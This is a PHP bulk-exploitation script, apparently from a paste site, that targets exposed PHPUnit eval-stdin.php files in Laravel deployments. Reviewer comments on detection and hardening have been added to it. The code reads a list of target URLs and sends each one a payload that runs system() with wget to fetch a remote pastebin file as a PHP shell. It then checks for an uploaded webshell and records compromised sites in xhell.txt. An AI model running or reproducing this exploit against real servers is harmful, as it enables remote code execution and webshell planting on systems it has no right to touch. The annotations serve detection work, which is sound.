ustadcage_48

Laravel framework phpunit RCE

Jun 18th, 2019
  1. <?php
  2. // coded by UstadCage_48
  3. // PHPlaravel RCE
  4. // Bacot sia mah ah  (author's taunt in informal Sundanese/Indonesian, roughly "you're all talk"; no functional meaning)
  5.  // NOTE(review): sample of a bulk scanner that abuses a web-reachable PHPUnit eval-stdin.php; the annotations below are for detection and hardening.
  6. error_reporting(0); // silences all PHP errors and warnings for the run
  7. echo "  ─────────────────────────
  8.  ╔╗─╔═╗─╔╦╗╔═╗─╔═╦═╗╔═╗╔╗─
  9.  ║╚╗║╬╚╗║╔╝║╬╚╗╚╗║╔╝║╩╣║╚╗
  10.  ╚═╝╚══╝╚╝─╚══╝─╚═╝─╚═╝╚═╝\n\n"; // ASCII-art banner only
  11. $site = $argv[1]; // first CLI argument; it is later read with file_get_contents() and split on newlines, i.e. a file of base URLs
  12. $by = '♥ LusianaQ<?php system("wget https://pastebin.com/raw/vKfyPDA3 -O eval-tad.php"); ?>'; // request body: the marker "LusianaQ" plus PHP that shells out to wget and saves a remote paste as eval-tad.php. Hunt for the marker, that file name, and web-server processes spawning wget
  13. $byy = fopen('tad.txt', 'w'); // the body is staged in tad.txt in the current working directory
  14. fwrite($byy,$by);
  15. fclose($byy);
  16. $up = '@tad.txt'; // curl "@file" form: the request body is read from tad.txt
  17. $path = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"; // PHPUnit development helper under vendor/. Hardening: keep vendor/ outside the document root, deploy without dev dependencies (composer install --no-dev), keep PHPUnit current, and alert on any HTTP request to this path
  18. function sv($site,$ext){ // sv(): appends the string $site as one line to the file "<ext>.txt"; returns nothing
  19. $fp = fopen("$ext.txt", 'a'); // 'a' = append mode, so earlier entries are kept; the fopen() result is not checked
  20. fwrite($fp, "$site\n");
  21. fclose($fp);
  22. }
  23. $kuning = "\033[93m"; // ANSI escape: bright yellow (terminal output colouring only)
  24. $ungu = "\033[95m"; // ANSI escape: bright magenta
  25. $biru = "\033[94m"; // ANSI escape: bright blue; not referenced elsewhere in this listing
  26. $merah = "\033[91m"; // ANSI escape: bright red, used for failure messages
  27. $hijau = "\033[92m"; // ANSI escape: bright green, used for success messages
  28. $lusi = explode("\n",file_get_contents($site)); // target list: the file named by $site, one entry per line
  29.    foreach($lusi as $url){
  30.       echo "$ungu [$] $kuning $url\n";
  31.     $jj = shell_exec("curl -sk -d ''".$up."'' ".$url.$path.""); // POSTs tad.txt to <entry> + $path via curl (-s quiet, -k skips TLS certificate checks). NOTE(review): list entries reach shell_exec() unescaped, so analysts should not run this sample on untrusted input
  32.     if(preg_match('/LusianaQ/',$jj)){ // a response containing the marker is treated as proof that the endpoint evaluated the request body; in access logs this appears as a POST to .../eval-stdin.php
  33.         echo "$ungu [$] $hijau Exploit Succesfuly...\n";
  34.         echo "$ungu [$] $kuning Checking Uploader...\n";
  35. $parse = parse_url($url.$path); // split the probed URL into scheme / host / path components
  36. $pattern = '~\w+\.php~'; // matches a PHP file name such as "stdin.php" (\w does not match the hyphen)
  37. $parse = preg_replace($pattern, '', $parse); // applied to the whole array, so the match is stripped from every component
  38. $site = $parse['scheme'].'://'.$parse['host'].$parse['path']; // rebuilt URL prefix for the directory holding eval-stdin.php; overwrites the earlier $site
  39.         if(preg_match('/USTADCAGE_48/',file_get_contents($site."tad.php"))){ // second probe: fetches a tad.php URL built from that prefix and looks for the USTADCAGE_48 marker. Hunt for unexpected .php files beside eval-stdin.php and for this marker in responses
  40.             echo "$ungu [$] $hijau Uploader Successfuly Created ! \n\n";
  41.             sv($site."tad.php","xhell"); // records the URL in xhell.txt via sv()
  42.         } else {
  43.             echo "$ungu [$] $merah Uploader Failed Created \n\n";
  44.         }
  45.     } else {
  46.         echo "$ungu [$] $merah Exploit Failed !! \n\n";
  47.     }
  48. }